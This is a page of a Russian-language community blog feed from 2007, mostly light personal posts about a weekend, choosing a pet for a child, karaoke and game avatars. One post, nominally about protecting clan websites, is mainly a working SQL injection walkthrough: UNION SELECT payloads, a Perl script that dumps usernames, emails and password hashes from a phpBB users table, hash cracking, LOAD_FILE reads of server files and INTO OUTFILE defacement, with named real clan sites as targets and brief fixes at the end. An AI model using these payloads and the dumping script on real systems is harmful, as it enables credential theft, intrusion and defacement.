|
18.06.07 10:19 |
Лизка | Выходные... |
ru |
Всего половину субботы и воскресенье не была в инете. Как итог - "Уведомления (всего 33| непрочитанных 33)"... Полдня теперь буду разбирать:)))
Mood: офигенное Music: Ани Лорак "С первой улыбки"
|
Comments: 15 | |
|
|
|
18.06.07 10:13 |
Лаки-Лаки | давайте думать вместе |
ru |
дочь (та, которой 9 лет), последнее время ноет по поводу зверюшки. пааааааааап! ну купи мне зверюшку!!! аааааа!!! самое простое - игнор. но жалко ребенка. ума не приложу кого завести. попробую сформулировать тз:
1. кошку не хочу. в двух комнатах ковровое покрытие, а кошка точно хоть раз да насикает. как воняют ковры обсиканные кошкой - я знаю. потом дерет, зараза, все подряд. хотя кошек люблю и не готов в принципе к новой потому как сильно переживал по поводу смерти предыдущего кота.
2. собака. щенок тоже гадит где попало. а выгуливать кто будет? да и поскольку мелких собак я не воспринимаю, то встанет вопрос о каждодневной готовке этому теленку.
3. хомячок - нафиг. они гадат с такой же скоростью, как и жрут, а размножаются чуть медленнее чем гадят. да и вид у них. ну и продолжительность жизни маленькая.
4. рыбки. не знаю. хлопот с ними. температура, корм, чистка аквариума и т.д. да и они какие-то... т.е. больше для интерьера.
вооот. может что посоветуете?
|
Comments: 79 | |
|
|
|
18.06.07 08:33 |
Фретка | Про БК, павлинов и понты..) |
ru |
не выдержала.. и ночью.. вместо здорового сна написала статью..
Читаем и заряжаемся хорошим настроением на весь первый в неделе рабочий день.
Mood: боевое  Music: Christina Aguilera - Hurt (Chris Cox Remix)
|
|
|
|
|
18.06.07 00:40 |
Фретка | КТО СМОТРИТ ДОМ-2?? |
ru |
оказывается, на проекте появилось домашщнее животное? хорек? уже несколько дней как там живет?
кто-нить в курсе? я просто никогда подобное не смотрела и смотреть не буду.. хоть Ксюшу и уважаю..
Mood: разговорчивое 
|
Comments: 23 | |
|
|
|
updated 16.12.09 19:34 17.06.07 14:57 |
Леся младшая | Рекомендую |
ru |
Наверное, в первый раз хочется похвалить статью в моем скролле. Прочитала я ее несколько минут назад, работа проделана действительно очень объемная и язык статьи - довольно живой.
Aldy [] рассказывает нам о нравах современных таможенников и проводит небольшой экскурс в историю этого подразделения. Собственно, статью можно было бы разделить на две условные части - в первой очень удачно описывается тенденция поведения зеленых и, в частности, те замашки на диктатуру в эме, что были так им присущи. Вторая часть - подробнейший разбор конкретного случая, когда один из таможенников открыто покрывает кач своей жены, а его коллеги кровавят тех, кто пытается дать ей отпор. После всех слов о нейтралитете этой структуры, статья производит действительно сильное впечатление.
Всем читать)
|
Comments: 11 | |
|
|
|
16.06.07 13:50 |
Лизка | Приятного аппетита! |
ru |
Mood: ржачное
|
Comments: 17 | |
|
|
|
16.06.07 11:40 |
Лизка | Образы. |
ru |
"УРРРРРРРРРРРРРРРАААААА!!!" - ору я! Наконец-то, нарисовали образ брюнетки, на который приятно смотреть. Напялила на себя:))
Вообще все три новых образа классные. Мне очень понравились. Художнику - "респект и уважуха":)) За образ брюнетки отдельное большое спасибо.
Mood: позитивное
|
Comments: 31 | |
|
|
|
16.06.07 10:56 |
Лизка | О том, как я опозорилась. |
ru |
Вчера, после очередного экзамена (на 4 сдалась), одногруппники потащили в Гидропарк (киевский, так сказать, центр развлечений), чтобы заценить кафешку, в которой будем отмечать окончание сессии. Выяснилось, что у них там можно петь под караоке. Лучше бы мне этого не говорили.
В общем, придумала, какую песню хочу спеть - у них её не оказалось... так, я перебрала штук 5 всяко-разных песен, но репертуарчик у них скудненький, поэтому пришлось петь хотя бы что-то, от чего меня не тошнит и что у них есть. Зря я так подумала. Выбрала, умная девочка, песню с очень высокими нотами и... опозорилась... наверное:)) Всё это дело записали на фотик. Потом послушаю, чё я там нафальшивила. И если не побоюсь позора и критики, выложу сюда.
Пела "Город 312 - Останусь".. Сбилась там посреди песни. Так переволновалась, что забыла о проигрыше:))
На публике пела первый раз в жизни. Пусть и не так хорошо, как хотелось бы, но всё-таки переступила через один из своих комплексов.
ЗЫ. Потом спела ещё одну песню, но там вообще не моя тональная категория была... даже вспоминать не хочу:)
Mood: сонное Music: слушаю, как обычно, что-то по радио.
|
Comments: 8 | |
|
|
|
16.06.07 03:55 |
чиппи-гламур | защити себя сам |
ru |
Для примера использован сайт клана Cossacks Of Hell
В связи с последними событиями в БК , я решил провести исследования клансайтов ..
К сожалению , как оказалось , большая часть подвержена серьезным уязвимостям..Я хочу рассказать вам и сберечь вас от наиболее распространенных..
Как оказалось 80% просмотренных мною клансайтов имеют схожие уязвимости - сиквэл инъекции , что далеко не странно , тк у программистов не хватает больше ума как использовать стандартные проверки в скриптах при обращении к реляционной базе данных..Зачем думать головой , если можно содрать уже написанное ? =))
Зачастую , о наличии сиквэл инъекции могут сказать ошибки , явно указывающие, что произошла ошибка в sql запросе. В тоже время о наличии ошибки в сиквэл запросе можно судить и по косвенным признакам ..
Чтобы реализовать наш с вами взлом давайте найдем параметр , значения которого передаются в запросе к БД.. Это достаточно просто , как правило это может быть параметр для обращения к новостной ленте , галлерии , списку статей , панели регестрации итд ..
структура такого запроса
http://site/test.php?id=номер статьи или новости
естественно , любой нормальный человек , увидев такое в строке запроса или в сорсе кода начнет сУвать туда всякую херь =)
http://site/test.php?id=9999
http://site/test.php?id=ааа
http://site/test.php?id=0
http://site/test.php?id=-0
http://site/test.php?id=-1000
итд
в 10 сайтах , уже на этом этапе я получил ошибку , связанную с неверным сиквэл запросом
Некоторые программисты наивно полагают , что их спасет заключение параметра в одиночные ковычки - ' и ошибочная фильтрация символов.. бугага =)
что-нить типо
<?php
$param=preg_replace("/[a-zA-Z0-9]i","",$param);
?php>
---------------------------------------------------------------------------
если исследуя скрипт выше мы еще не получили ошибки , продолжим =))
http://site/test.php?id=-1'+/*
таким нехитрым маневром мы закрываем первую кавычку и ставим незакрытый сиквэл комментарий , который превращает следующий в запросе код в бесполезную информацию.
вуаля =))
*
Следует отметить , что вы можете и не получать вывод ошибочного запроса , но если в результате ковыряния параметра вы получаете редирект на главную страницу , или еще лучше страницу с пустым запросом или 500 ошибкой шттп - вы на верном пути и правильно выбрали атакуемый параметр ..
*
Дальше можно было бы и не писать ничего , если бы я не сомневался в профессионализме прогеров ..
далее начинаем подбирать верный запрос к таблице , туд , методом перебора выясняется номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу
http://site/test.php?id=-1'+union+select+null/*
если и такой запрос выдаст ошибку синтаксиса или пустую страницу , значит в скрипте, возможно имеется проверка на не пустоту одного из параметров ...
тогда идем конём ..
http://site/test.php?id=-1'+union+select+1/*
еееееее
http://site/test.php?id=-1'+union+select+1,2,3 итд/*
http://site/test.php?id=-1'+union+select+null,null,null,null,null,null,null/*
или если фильтруется пробуем
http://site/test.php?id=-1'+union+select+1,2,3,4,5,6,7/*
вуаля =))
Теперь можно перебирать имена таблиц .. Правильные запросы будут соответствовать существующим именам таблиц .. Наверно , интересно будет проверить на существование таблиц users , passwords , regusers и тд и тп ..
Если выводиться только одна строка из запроса (например , вместо тела статьи) , то можно передвигаться по строкам путем limit ..
http://site/test.php?id=-1'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,1/*
вуаля =))
*отдельно стоит рассказать про сиквэл функцию char() .. в качестве аргумента она принимает десятичный код ASCII символа , это нужно в том случае , когда скриптом фильтруются нужные символы...
например char(47) вернет нам / , когда если бы мы отослали его напрямую этот символ бы отфильтровался ..
*
Итак - мы имеем пароли в мд5 , логины и почтовые ящики пользователей .. (n делить на два , потом n деленное на два разделить на два итд)
Методом мат. анализа определяем , что записей в phpbb_forum тут 489 .. Анализируем сорс ошибки..
и пишем несложный скрипт на перле
не люблю я пхп =))
#!/usr/bin/perl -w
use LWP;
use strict;
my $ua=LWP::UserAgent->new;
my $i;
my $res;
$path='путь к уязвимости=-1\'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit';
for ($i=1;$i<=488;$i++) {
my $res=$ua->request(HTTP::Request->new(GET=>$path.'+'."$i".',1/*'));
if ($res->is_success) {
$res->content=~/<center>Запрещено просматривать статью '(.*):(.*):(.*)'/;
open (LOG,">>list") || die " cant open file";
print LOG $1.':'.$2.':'.$3."\n";
close LOG;
} else {
print $res->status_line;
}
}
В кратце - используем модуль лвл для последовательного гет запроса ко всем строкам таблицы , выделяем из сорса нужные тэги , а из них в свою очередь - логины , пароли и мэйлы ..
вуаля =))
в фале list , в одной корневой со скриптом через 2 мин у нас вся база данных сайта =))
кидаем пароли клана на подбор в любую утилиту для штурма мд5
и вуаля , через минуту у нас уже пасс от одного соклана ..
а еще через два дня , от половины
но какого же будет ваше удивление , когда в ответ на инъекцию
http://site/test.php?id=-1'+union+select+1,LOAD_FILE(''),3,4,5,6,7/*
вы получите
сайтик то , на винде стоит , а это увеличивает полет фантазии вдвое
нам на самом деле и не нужны пароли , их можно и не качать ..
Достаточно написать что - нить типа
http://site/test.php?id=-1'+union+select+1,LOAD_FILE('путь к любому файлу на диске C:\'),3,4,5,6,7/*
для просмотра любого скрипта
и
http://site/test.php?id=-1'+union+select+1,'',2,3,4,5,6,7+from+phpbb_forum+into+outfile+'C:\usr\local\site\www\index.php'/*
для дефейса .. те подмены главной страницы .. да и вообще стереть любой файл можно ..
или закачать свое ..
Похожие уязвимости я нашел почти на всех топ клан сайтах ..
Даркклан , рмиб и пачке других..
Попытаться исправить это можно путем
- для целых и дробных величин , перед их использованием в запросе надо привести величину к нужному типу ..
$id=(int)$id; $total=(float)$total;
Вместо этого можно вставить систему слежения за тестированием на сиквэл инъекцию ..
if((string)$id<>(string)(int)$id) {
// пишем в лог о попытке ..
die('ops');
}
- для строковых параметров , которые не используются в like , regexp и тд , экранируем кавычки ..
$str=addslashes($str);
или , лучше я всегда советовал
mysql_escape_string($str)
- в строках , которые предполагается использовать внутри like , regexp и тд , необходимо так же заэкранировать специальные символы , применяющиеся в этих операторах , если это необходимо.. В противном случае , можно задокументировать использование этих символов ..
На прощание хочу сказать - никогда не ждите благодарностей от людей..
удачи , и помните - если жизнь свернула вас как удав , терпите =)))
hacked by 4
hacked by RaD
отдельное спасибо Diogen-у
|
Comments: 19 | |
|
|
Total posts: 4425 Pages: 443
1.. 10.. 20.. 30.. 40.. 50.. 60.. 70.. 80.. 90.. 100.. 110.. 120.. 130.. 140.. 150.. 160.. 170.. 180.. 190.. 200.. 210.. 220.. 230.. 240.. 250.. 260.. 270.. 280.. 290.. 300.. 310.. 320.. 330.. 340.. 350.. 360.. 370.. 380.. 389 390 391 392 393 394 395 396 397 398 399 400.. 410.. 420.. 430.. 440..
|
|
Mo |
Tu |
We |
Th |
Fr |
Sa |
Su |
| | | | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | | | | | | |
|